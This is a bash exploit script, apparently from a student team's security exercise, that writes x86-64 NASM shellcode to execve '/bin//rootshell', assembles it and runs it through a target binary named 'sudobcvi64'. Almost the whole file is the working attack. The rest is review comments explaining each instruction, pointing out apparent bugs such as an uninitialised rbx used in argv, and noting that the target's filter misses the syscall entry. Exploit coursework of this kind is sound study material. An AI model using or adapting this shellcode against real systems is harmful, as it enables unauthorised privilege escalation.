#!/bin/bash
# Exploit handcrafted by Team Shell Smash.
# zhan4854, beach144, jerus005
#
# Review summary of what this script does:
#   1. writes a NASM source file (shellcode.s) holding an x86-64
#      execve("/bin//rootshell", argv, envp) stub,
#   2. assembles it into a flat binary blob with `nasm -f bin`,
#   3. runs the target `sudobcvi64` with that blob as its argument and a
#      fixed string on stdin.
# There is no `set -e`, so a failure in step 2 still falls through to step 3.
# The heredoc delimiter is unquoted (<< EOF), so the shell would expand `$`,
# backticks and `\` inside it; the text below contains none, so the file is
# written verbatim.
# NOTE(review): NASM's own comment character is `;`. The `#` lines inside the
# heredoc are assumed to be tolerated by the nasm version used here — confirm,
# since a rejected line would make the assembly step fail.

# Shellcode
cat > shellcode.s << EOF
bits 64
# Pad with four zeros
db 0x00, 0x00, 0x00, 0x00         ; leading 4 zero bytes — presumably required by how the target enters the blob; TODO confirm

push rbp                          ; pushed unchanged; purpose not evident from this file
# Pushing 0x00000000, which is the second argument of argv[]
xor rax, rax                      ; rax = 0 (also the base for the `mov al` below)
push rax                          ; 8-byte NULL; note it sits ABOVE the path string on the stack (see argv below)

# The string "/bin//rootshell", literally
mov rdi, 0x006c6c656873746f       ; "otshell\0" in little-endian — the high qword, carries the terminator
push rdi
mov rdi, 0x6f722f2f6e69622f       ; "/bin//ro" — the low qword; after this push rsp points at the NUL-terminated path
push rdi

# 1st argument (filename)
mov rdi, rsp                      ; rdi = &"/bin//rootshell"
# 3rd argument (envp), should be 0x00000000
push rax                          ; NULL
mov rdx, rsp                      ; rdx = envp = pointer to that NULL
# 2nd argument (argv), is a pointer to 1st argument
push rbx                          ; NOTE(review): rbx is never written in this code, so argv[0] = whatever rbx holds on entry (not the rdi path pointer)
mov rsi, rsp                      ; rsi = argv; argv[1] is the NULL pushed for envp just above

# 0x3b, or 59 is the syscall number for execve
mov al, 0x3b                      ; low byte only — relies on rax == 0 from the xor above
# Blocking int 0x80 and sysenter but not syscall? lol
syscall                           ; execve(rdi, rsi, rdx); clobbers rcx/r11; only returns on failure
                                  ; defender's note: per the comment above, the filter on this target evidently
                                  ; covers int 0x80 and sysenter but not the 64-bit `syscall` entry —
                                  ; a syscall filter needs to cover all three entry paths
ret                               ; reached only if execve failed (rax = -errno)
EOF

# Compile to bin
nasm -f bin -o shellcode shellcode.s    # flat binary: raw instruction bytes, no ELF header

# Execute
echo "llllR" | sudobcvi64 shellcode     # target binary is not part of this file; what it does with "llllR" on stdin is not visible here